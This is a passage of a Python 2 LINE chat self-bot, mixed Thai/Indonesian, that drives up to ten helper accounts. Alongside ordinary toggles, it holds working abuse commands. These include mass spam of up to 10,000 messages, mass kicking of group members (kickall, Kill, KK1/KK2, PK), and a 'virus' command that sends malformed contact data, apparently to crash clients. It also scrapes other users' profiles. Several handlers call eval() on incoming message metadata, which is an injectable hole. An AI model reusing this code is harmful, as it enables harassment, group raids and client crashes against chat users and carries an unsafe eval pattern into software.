cl.sendText(msg.to,"➠ เปิดข้อความต้อนรับเเล้ว👌")
else:
cl.sendText(msg.to,"Already on")
else:
wait["acommentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ เปิดข้อความต้อนรับเเล้ว👌")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Hhx2 on"]:
if wait["bcommentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ เปิดข้อความกล่าวถึงคนออกจากกลุ่ม👌")
else:
cl.sendText(msg.to,"Already on")
else:
wait["bcommentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ เปิดข้อความกล่าวถึงคนออกจากกลุ่ม👌")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Hhx3 on"]:
if wait["ccommentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ เปิดข้อความกล่าวถึงคนลบสมาชิก👌")
else:
cl.sendText(msg.to,"Already on")
else:
wait["ccommentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ เปิดข้อความกล่าวถึงคนลบสมาชิก👌")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Hhx1 off"]:
if wait["acommentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ ปิดข้อความต้อนรับเเล้ว👌")
else:
cl.sendText(msg.to,"Already off")
else:
wait["acommentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ ปิดข้อความต้อนรับเเล้ว👌")
else:
cl.sendText(msg.to,"Already off")
elif msg.text in ["Hhx2 off"]:
if wait["bcommentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ ปิดข้อความกล่าวถึงคนออกจากกลุ่ม👌")
else:
cl.sendText(msg.to,"Already off")
else:
wait["bcommentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ ปิดข้อความกล่าวถึงคนออกจากกลุ่ม👌")
else:
cl.sendText(msg.to,"Already off")
elif msg.text in ["Hhx3 off"]:
if wait["ccommentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ ปิดข้อความกล่าวถึงคนลบสมาชิก👌")
else:
cl.sendText(msg.to,"Already off")
else:
wait["ccommentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ ปิดข้อความกล่าวถึงคนลบสมาชิก👌")
else:
cl.sendText(msg.to,"Already off")
elif msg.text in ["Gurl"]:
if msg.toType == 2:
uye = random.choice(KAC)
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
uye.updateGroup(x)
gurl = uye.reissueGroupTicket(msg.to)
uye.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
uye.sendText(msg.to,"Can not be used outside the group")
else:
uye.sendText(msg.to,"Not for use less than group")
elif "Ambil QR: " in msg.text:
if msg.toType == 2:
gid = msg.text.replace("Ambil QR: ","")
gurl = cl.reissueGroupTicket(gid)
cl.sendText(msg.to,"line://ti/g/" + gurl)
else:
cl.sendText(msg.to,"Not for use less than group")
elif "Y1 gurl: " in msg.text:
if msg.toType == 2:
gid = msg.text.replace("Y1 gurl: ","")
x = ki1.getGroup(gid)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
ki1.updateGroup(x)
gurl = ki1.reissueGroupTicket(gid)
ki1.sendText(msg.to,"line://ti/g/" + gurl)
else:
ki1.sendText(msg.to,"Not for use less than group")
elif "Y2 gurl: " in msg.text:
if msg.toType == 2:
gid = msg.text.replace("Y2 gurl: ","")
x = ki2.getGroup(gid)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
ki2.updateGroup(x)
gurl = ki2.reissueGroupTicket(gid)
ki2.sendText(msg.to,"line://ti/g/" + gurl)
else:
ki2.sendText(msg.to,"Not for use less than group")
#========================================
elif msg.text in ["Comment bl "]:
wait["wblack"] = True
cl.sendText(msg.to,"add to comment bl")
elif msg.text in ["Comment wl "]:
wait["dblack"] = True
cl.sendText(msg.to,"wl to comment bl")
elif msg.text in ["Comment bl confirm"]:
if wait["commentBlack"] == {}:
cl.sendText(msg.to,"confirmed")
else:
cl.sendText(msg.to,"Blacklist s")
mc = ""
for mi_d in wait["commentBlack"]:
mc += "・" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif msg.text in ["turn on the clock","Clock:on","Clock on","Jam on","Jam:on"]:
if wait["clock"] == True:
cl.sendText(msg.to,"already on")
else:
wait["clock"] = True
now2 = datetime.now()
nowT = datetime.strftime(now2,"༺%H:%M༻")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"done")
elif msg.text in ["turn off the clock","Clock:off","Clock off","Jam off","Jam:off"]:
if wait["clock"] == False:
cl.sendText(msg.to,"already off")
else:
wait["clock"] = False
cl.sendText(msg.to,"done")
elif "naming: " in msg.text:
n = msg.text.replace("naming: ","")
if len(n.decode("utf-8")) > 13:
cl.sendText(msg.to,"changed")
else:
wait["cName"] = n
cl.sendText(msg.to,"Changed to:\n\n" + n)
elif msg.text in ["Up"]:
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"༺%H:%M༻")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"Refresh to update")
else:
cl.sendText(msg.to,"Please turn on the name clock")
elif "/ " in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'id'
kata = msg.text.replace("/ ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
path = "http://chart.apis.google.com/chart?chs=480x80&cht=p3&chtt=" + result + "&chts=FFFFFF,70&chf=bg,s,000000"
urllib.urlretrieve(path, "steal.png")
tts = gTTS(text=result, lang='id')
tts.save('tts.mp3')
cl.sendImage(msg.to,"steal.png")
cl.sendText(msg.to,"DITAMPILKAN UNTUK TEXT\n" + "" + kata + "\n「SUKSES」")
cl.sendAudio(msg.to,'tts.mp3')
#========================================
elif "/ปก @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("/ปก @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
cl.sendImageWithUrl(msg.to, path)
except:
pass
print "[Command]dp executed"
elif "Hack2mid:" in msg.text:
umid = msg.text.replace("Hack2mid:","")
contact = cl.getContact(umid)
try:
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
except:
image = "https://www.1and1.co.uk/digitalguide/fileadmin/DigitalGuide/Teaser/not-found-t.jpg"
try:
cl.sendImageWithUrl(msg.to,image)
except Exception as error:
cl.sendText(msg.to,(error))
pass
elif "/รูป" in msg.text:
if msg.toType == 2:
msg.contentType = 0
steal0 = msg.text.replace("/รูป","")
steal1 = steal0.lstrip()
steal2 = steal1.replace("@","")
steal3 = steal2.rstrip()
_name = steal3
group = cl.getGroup(msg.to)
targets = []
for g in group.members:
if _name == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Gak da orange")
else:
for target in targets:
try:
contact = cl.getContact(target)
try:
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
except:
image = "https://www.1and1.co.uk/digitalguide/fileadmin/DigitalGuide/Teaser/not-found-t.jpg"
try:
cl.sendImageWithUrl(msg.to,image)
except Exception as error:
cl.sendText(msg.to,(error))
pass
except:
cl.sendText(msg.to,"Error!")
break
else:
cl.sendText(msg.to,"Tidak bisa dilakukan di luar grup")
#===============================================
elif msg.text in ["Sp","sp","Speed"]:
cl.sendText(msg.to, "Progress.......")
start = time.time()
time.sleep(0.001)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif msg.text in ["Bot Speed"]:
ki1.sendText(msg.to, "Progress.......")
start = time.time()
time.sleep(0.001)
elapsed_time = time.time() - start
ki1.sendText(msg.to, "%sseconds" % (elapsed_time))
ki2.sendText(msg.to, "%sseconds" % (elapsed_time))
ki3.sendText(msg.to, "%sseconds" % (elapsed_time))
ki4.sendText(msg.to, "%sseconds" % (elapsed_time))
ki5.sendText(msg.to, "%sseconds" % (elapsed_time))
ki6.sendText(msg.to, "%sseconds" % (elapsed_time))
ki7.sendText(msg.to, "%sseconds" % (elapsed_time))
ki8.sendText(msg.to, "%sseconds" % (elapsed_time))
ki9.sendText(msg.to, "%sseconds" % (elapsed_time))
ki10.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif msg.text in ["Keybot"]:
ki1.sendText(msg.to, "[DPK🐲BOT\nBy.☬ARIFISTIFIK☬]\n\n❂͜͡☆➣ Namelock on\n❂͜͡☆➣ Namelock off\n❂͜͡☆➣ Blockinvite on\n❂͜͡☆➣ Blockinvite off\n❂͜͡☆➣ Backup on\n❂͜͡☆➣ Backup off\n\n[By.☬ARIFISTIFIK☬]")
#========================================
elif msg.text in ["mybackup","Mebb"]:
try:
cl.updateDisplayPicture(mybackup.pictureStatus)
cl.updateProfile(mybackup)
cl.sendText(msg.to, "Backup Sukses Bosqu")
except Exception as e:
cl.sendText(msg.to, str (e))
#=================================================
elif msg.text == "#mid on":
cl.sendText(msg.to, "Done..")
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
now2 = datetime.now()
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
wait2['ROM'][msg.to] = {}
print wait2
elif msg.text == "#mid off":
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
print rom
chiya += rom[1] + "\n"
cl.sendText(msg.to, "%s\n\n%s\nReadig point creation:\n [%s]\n" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
else:
cl.sendText(msg.to, "Ketik Lurking dulu dudul Baru bilang result Point.")
#========================================
#-------------------Fungsi spam finish----------------------------
elif "Gpict" in msg.text:
if msg.from_ in admin:
group = cl.getGroup(msg.to)
path = "http://dl.profile.line-cdn.net/" + group.pictureStatus
cl.sendImageWithUrl(msg.to,path)
elif "Bot off" in msg.text:
if msg.from_ in admsa:
try:
import sys
sys.exit()
except:
pass
#-----------------------------------------------
elif msg.text in ["ลิ้ง","url"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
cl.updateGroup(x)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendText(msg.to,"[SELF BOT]\n[By.☬ARIFISTIFIK☬]\nline://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Notifed on","เปิดแจ้งเตือน","M on"]:
if msg.from_ in admin:
if wait["Notifed"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Notifed On\n\nเปิดเเจ้งเเตือนของคุณเเล้ว")
else:
cl.sendText(msg.to,"Done\n\nเปิดเเจ้งเเตือนของคุณเเล้ว")
else:
wait["Notifed"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Notifed On\n\nเปิดเเจ้งเเตือนของคุณเเล้ว")
else:
cl.sendText(msg.to,"Done\n\nเปิดเเจ้งเเตือนของคุณเเล้ว")
elif msg.text in ["Notifed off","ปิดแจ้งเตือน","M off"]:
if msg.from_ in admin:
if wait["Notifed"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Notifed Off\n\nปิดเเจ้งเเตือนของคุณเเล้ว")
else:
cl.sendText(msg.to,"Done\n\nปิดเเจ้งเเตือนของคุณเเล้ว")
else:
wait["Notifed"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Notifed Off\n\nปิดเเจ้งเเตือนของคุณเเล้ว")
else:
cl.sendText(msg.to,"Done\n\nปิดเเจ้งเเตือนของคุณเเล้ว")
elif msg.text in ["Notifedbot on","เปิดเเจ้งเตือนmybot","Mbot on"]:
if msg.from_ in admin:
if wait["Notifedbot"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"All bot Notifed On\n\nเปิดเเจ้งเเตือนmybotเเล้ว")
else:
cl.sendText(msg.to,"Done\n\nเปิดเเจ้งเเตือนmybotเเล้ว")
else:
wait["Notifedbot"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"All bot Notifed On\n\nเปิดเเจ้งเเตือนmybotเเล้ว")
else:
cl.sendText(msg.to,"Done\n\nเปิดเเจ้งเเตือนmybotเเล้ว")
elif msg.text in ["Notifedbot off","ปิดแจ้งเตือนmybot","Mbot off"]:
if msg.from_ in admin:
if wait["Notifedbot"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"All bot Notifed Off\n\nปิดเเจ้งเเตือนmybotเเล้ว")
else:
cl.sendText(msg.to,"Done\n\nปิดเเจ้งเเตือนmybotเเล้ว")
else:
wait["Notifedbot"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"All bot Notifed Off\n\nปิดเเจ้งเเตือนmybotเเล้ว")
else:
cl.sendText(msg.to,"Done\n\nปิดเเจ้งเเตือนmybotเเล้ว")
#=================================================
elif "Spam " in msg.text:
if msg.from_ in admin:
txt = msg.text.split(" ")
jmlh = int(txt[2])
teks = msg.text.replace("Spam "+str(txt[1])+" "+str(jmlh)+ " ","")
tulisan = jmlh * (teks+"\n")
#Keke cantik <3
if txt[1] == "on":
if jmlh <= 10000:
for x in range(jmlh):
cl.sendText(msg.to, teks)
else:
cl.sendText(msg.to, "Out of range! ")
elif txt[1] == "off":
if jmlh <= 10000:
cl.sendText(msg.to, tulisan)
else:
cl.sendText(msg.to, "Out of range! ")
#-----------------------------------------------
elif "Mid @" in msg.text:
_name = msg.text.replace("Mid @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
cl.sendText(msg.to, g.mid)
else:
pass
#-------------------------------------------------
elif msg.text in ["เปิดหมด","Phet All on","Phet all on"]:
cl.sendText(msg.to,"[SELF BOT]\n[By.☬ARIFISTIFIK☬]")
cl.sendText(msg.to,"Please wait......")
cl.sendText(msg.to,"Turn on all protection")
cl.sendText(msg.to,"Qr:on")
cl.sendText(msg.to,"Backup:on")
cl.sendText(msg.to,"Read:on")
cl.sendText(msg.to,"Respon:on")
cl.sendText(msg.to,"Responkick:on")
cl.sendText(msg.to,"Protect:on")
cl.sendText(msg.to,"Namelock:on")
cl.sendText(msg.to,"Blockinvite:on")
elif msg.text in ["ปิดหมด","Phet All off","Phet all off"]:
cl.sendText(msg.to,"[DPK🐲BOT]\n[By.☬ARIFISTIFIK☬]")
cl.sendText(msg.to,"Please wait......")
cl.sendText(msg.to,"Turn off all protection")
cl.sendText(msg.to,"Qr:off")
cl.sendText(msg.to,"Backup:off")
cl.sendText(msg.to,"Read:off")
cl.sendText(msg.to,"Respon:off")
cl.sendText(msg.to,"Responkick:off")
cl.sendText(msg.to,"Protect:off")
cl.sendText(msg.to,"Namelock:off")
cl.sendText(msg.to,"Blockinvite:off")
cl.sendText(msg.to,"Link off")
elif msg.text in ["Team"]:
msg.contentType = 13
cl.sendText(msg.to, "[TEAM DPK🐲BOT]\n[By.☬ARIFISTIFIK☬]")
cl.sendText(msg.to, "ผู้สร้าง.. DPK🐲BOT\nBy.🔯ARIFISTIFIK🔯")
msg.contentMetadata = {'mid': 'u65224f4e8812136f01b25275a54b5aef'}
cl.sendMessage(msg)
cl.sendText(msg.to, "ผู้จัดการ .DPK🐲BOT\nBy.☬ARIFISTIFIK☬")
msg.contentMetadata = {'mid': 'u6c8aab6ee167a596be2cf045ee2f90df'}
cl.sendMessage(msg)
cl.sendText(msg.to, "หวานใจ\nBy.ผู้สร้างพญาไฟ")
msg.contentMetadata = {'mid': 'u2743230861d1c637647d9ca2a8c1fc14'}
cl.sendMessage(msg)
cl.sendText(msg.to, "ประธาน:")
msg.contentMetadata = {'mid': 'u5b671f4148aa5bbec186b5b7cb295271'}
cl.sendMessage(msg)
cl.sendText(msg.to, "รองประธาน:💫 By. พยัค")
msg.contentMetadata = {'mid': 'u7988143c47d3faacf1856a72011eea93'}
cl.sendMessage(msg)
cl.sendText(msg.to, "รปภ.:DPK🐲BOT")
msg.contentMetadata = {'mid': 'u5b671f4148aa5bbec186b5b7cb295271'}
cl.sendMessage(msg)
cl.sendText(msg.to, "ตัวเเทนสมาชิก:By.บอล")
msg.contentMetadata = {'mid': 'ueabd832a84add1392a2ff758f97b3c8e'}
cl.sendMessage(msg)
#========================================
elif "virus" in msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.to+"',"}
cl.sendMessage(msg)
elif "kickall" in msg.text:
if msg.toType == 2:
print "Kickall ok"
_name = msg.text.replace("kickall","")
gs = ki1.getGroup(msg.to)
gs = ki2.getGroup(msg.to)
gs = ki3.getGroup(msg.to)
gs = ki4.getGroup(msg.to)
gs = ki5.getGroup(msg.to)
gs = ki6.getGroup(msg.to)
gs = ki7.getGroup(msg.to)
gs = ki8.getGroup(msg.to)
gs = ki9.getGroup(msg.to)
gs = ki10.getGroup(msg.to)
ki1.sendText(msg.to, "Hello all...😁😁 {}")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found.")
# ki1.sendText(msg.to,"Not found.")
else:
for target in targets:
if not target in Bots:
try:
klist=[ki1,ki2,ki10]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
pass
# ki3.sendText(msg,to,"Nuke Finish")
# ki2.sendText(msg,to,"
elif msg.text in ["Kill"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
random.choice(KAC).sendText(msg.to,"Fuck You")
return
for jj in matched_list:
try:
klist=[ki1,ki2,ki10]
kicker = random.choice(klist)
kicker.kickoutFromGroup(msg.to,[jj])
print (msg.to,[jj])
except:
pass
elif ("PK4 " in msg.text):
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki6.kickoutFromGroup(msg.to,[target])
except:
ki6.sendText(msg.to,"Error")
elif "KK2 " in msg.text:
nk0 = msg.text.replace("KK2 ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
ki2.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki2.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
gs.preventJoinByTicket(gs)
cl.updateGroup(gs)
elif "KK1 " in msg.text:
nk0 = msg.text.replace("KK1 ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki1.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
ki1.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki1.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
gs.preventJoinByTicket(gs)
cl.updateGroup(gs)
#-----------------------------------------------------------
elif "contactjoin:" in msg.text:
try:
source_str = 'abcdefghijklmnopqrstuvwxyz1234567890@:;./_][!&%$#)(=~^|'
name = "".join([random.choice(source_str) for x in xrange(10)])
amid = msg.text.replace("contactjoin:","")
cl.sendText(msg.to,str(cl.channel.createAlbumF(msg.to,name,amid)))
except Exception as e:
try:
cl.sendText(msg.to,str(e))
except:
pass
elif ("PK2 " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki2.kickoutFromGroup(msg.to,[target])
except:
ki2.sendText(msg.to,"Error")
elif ("PK3 " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki5.kickoutFromGroup(msg.to,[target])
except:
ki5.sendText(msg.to,"Error")
elif ("PK " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
except:
cl.sendText(msg.to,"Error")
elif "สั่งดำ @" in msg.text:
_name = msg.text.replace("Blacklist @","")
_kicktarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _kicktarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found")
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Success Boss")
except:
cl.sendText(msg.to,"error")
elif "แบน @" in msg.text:
if msg.toType == 2:
print "[BL]ok"
_name = msg.text.replace("แบน @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found.")
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Success Masuk daftar orang bejat Boss")
except:
cl.sendText(msg.to,"Error")
elif "ลบแบน @" in msg.text:
if msg.toType == 2:
print "[WL]ok"
_name = msg.text.replace("ลบแบน @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found.")
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Sudah di keluarkan dari daftar bejat Boss")
except:
cl.sendText(msg.to,"There was no blacklist user")
elif msg.text in ["Clear ban","ล้างดำ"]:
wait["blacklist"] = {}
cl.sendText(msg.to,"clear")
elif msg.text in ["Ban"]:
wait["wblacklist"] = True
cl.sendText(msg.to,"send contact to ban")
elif msg.text in ["Unban"]:
wait["dblacklist"] = True
cl.sendText(msg.to,"send contact to ban")
elif msg.text in ["Banlist","Mcheck"]:
if wait["blacklist"] == {}:
cl.sendText(msg.to,"Nothing double thumbs up")
else:
cl.sendText(msg.to,"Daftar Banlist")
mc = "[⎈]Blacklist [⎈]\n"
for mi_d in wait["blacklist"]:
mc += "[✗] " + cl.getContact(mi_d).displayName + " \n"
cl.sendText(msg.to, mc + "")
elif msg.text in ["Me ban","Cekban","Mcheck mid"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
cocoa = "[⎈]Mid Blacklist [⎈]"
for mm in matched_list:
cocoa += "\n" + mm + "\n"
cl.sendText(msg.to,cocoa + "")
#=============================================
elif msg.text in ["Simisimi on","Simisimi:on"]:
settings["simiSimi"][msg.to] = True
cl.sendText(msg.to,"Success activated simisimi")
elif msg.text in ["Simisimi off","Simisimi:off"]:
settings["simiSimi"][msg.to] = False
cl.sendText(msg.to,"Success deactive simisimi")
elif msg.text in ["เปิด อ่าน","Read on","Read:on"]:
wait['alwayRead'] = True
cl.sendText(msg.to,"เปิดอ่านข้อความอัตโนมัติ.👌")
elif msg.text in ["ปิด อ่าน","Read off","Read:off"]:
wait['alwayRead'] = False
cl.sendText(msg.to,"ปิดอ่านข้อความอัตโนมัติ.👌")
elif msg.text in ["Tag on","Autorespon:on","Respon on","Respon:on"]:
wait["detectMention"] = True
cl.sendText(msg.to,"Auto Respon ON")
elif msg.text in ["Tag off","Autorespon:off","Respon off","Respon:off"]:
wait["detectMention"] = False
cl.sendText(msg.to,"Auto Respon OFF")
elif msg.text in ["Tag1","Tag1"]:
cl.sendText(msg.to,"ข้อความแทคล่าสุดคือ\n\n" + str(wait["tag1"]))
elif msg.text in ["Tag2","Tag2"]:
cl.sendText(msg.to,"ข้อความแทคล่าสุดคือ\n\n" + str(wait["tag2"]))
elif "Tag1:" in msg.text:
wait["tag1"] = msg.text.replace("Tag1: ","")
cl.sendText(msg.to,"ข้อความแทคล่าสุดคือ")
elif "Tag2:" in msg.text:
wait["tag2"] = msg.text.replace("Tag2: ","")
cl.sendText(msg.to,"ข้อความแทคล่าสุดคือ")
elif msg.text in ["Kicktag on","Autokick:on","Responkick on","Responkick:on"]:
wait["kickMention"] = True
cl.sendText(msg.to,"Auto Kick ON")
elif msg.text in ["Kicktag off","Autokick:off","Responkick off","Responkick:off"]:
wait["kickMention"] = False
cl.sendText(msg.to,"Auto Kick OFF")
elif msg.text in ["Cancel on","cancel on"]:
if msg.from_ in admin:
if wait["Protectcancl"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancl"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Cancel off","cancel off"]:
if msg.from_ in admin:
if wait["Protectcancl"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancl"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan Off")
else:
cl.sendText(msg.to,"done")
#==============================================================================#
#==============================================================================#
elif "Phackmid:" in msg.text:
saya = msg.text.replace("Phackmid:","")
msg.contentType = 13
msg.contentMetadata = {"mid":saya}
cl.sendMessage(msg)
contact = cl.getContact(saya)
cu = cl.channel.getCover(saya)
path = str(cu)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
try:
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nBio :\n" + contact.statusMessage)
cl.sendText(msg.to,"Profile Picture " + contact.displayName)
cl.sendImageWithURL(msg.to,image)
cl.sendText(msg.to,"Cover " + contact.displayName)
cl.sendImageWithUrl(msg.to,path)
except:
pass
elif "#Phackgid:" in msg.text:
saya = msg.text.replace("#Phackgid:","")
gid = cl.getGroupIdsJoined()
for i in gid:
h = cl.getGroup(i).id
group = cl.getGroup(i)
if h == saya:
try:
creator = group.creator.mid
msg.contentType = 13
msg.contentMetadata = {'mid': creator}
md = "Nama Grup :\n" + group.name + "\n\nID Grup :\n" + group.id
if group.preventJoinByTicket is False: md += "\n\nKode Url : Diizinkan"
else: md += "\n\nKode Url : Diblokir"
if group.invitee is None: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : 0 Orang"
else: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : " + str(len(group.invitee)) + " Orang"
cl.sendText(msg.to,md)
cl.sendMessage(msg)
cl.sendImageWithUrl(msg.to,"http://dl.profile.line.naver.jp/"+ group.pictureStatus)
except:
creator = "Error"
elif msg.text in ["Friendlist","เช็คเพื่อนทั้งหมด","#เพื่อน","เพื่อนทั้งหมด","Fyall"]:
contactlist = cl.getAllContactIds()
kontak = cl.getContacts(contactlist)
num=1
msgs="═════════รายชื่อเพื่อน═════════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n════════รายชื่อเพื่อย════════\n\nเจำนวนเพื่อน : %i" % len(kontak)
cl.sendText(msg.to, msgs)
elif msg.text in ["เพื่อน","Memlist","Nameall"]:
kontak = cl.getGroup(msg.to)
group = kontak.members
num=1
msgs="═════════รายชื่อเพื่อน═════════-"
for ids in group:
msgs+="\n[%i] %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n════════รายชื่อเพื่อน════════\n\nจำนวนเพื่อน : %i" % len(group)
cl.sendText(msg.to, msgs)
elif "Friendinfo: " in msg.text:
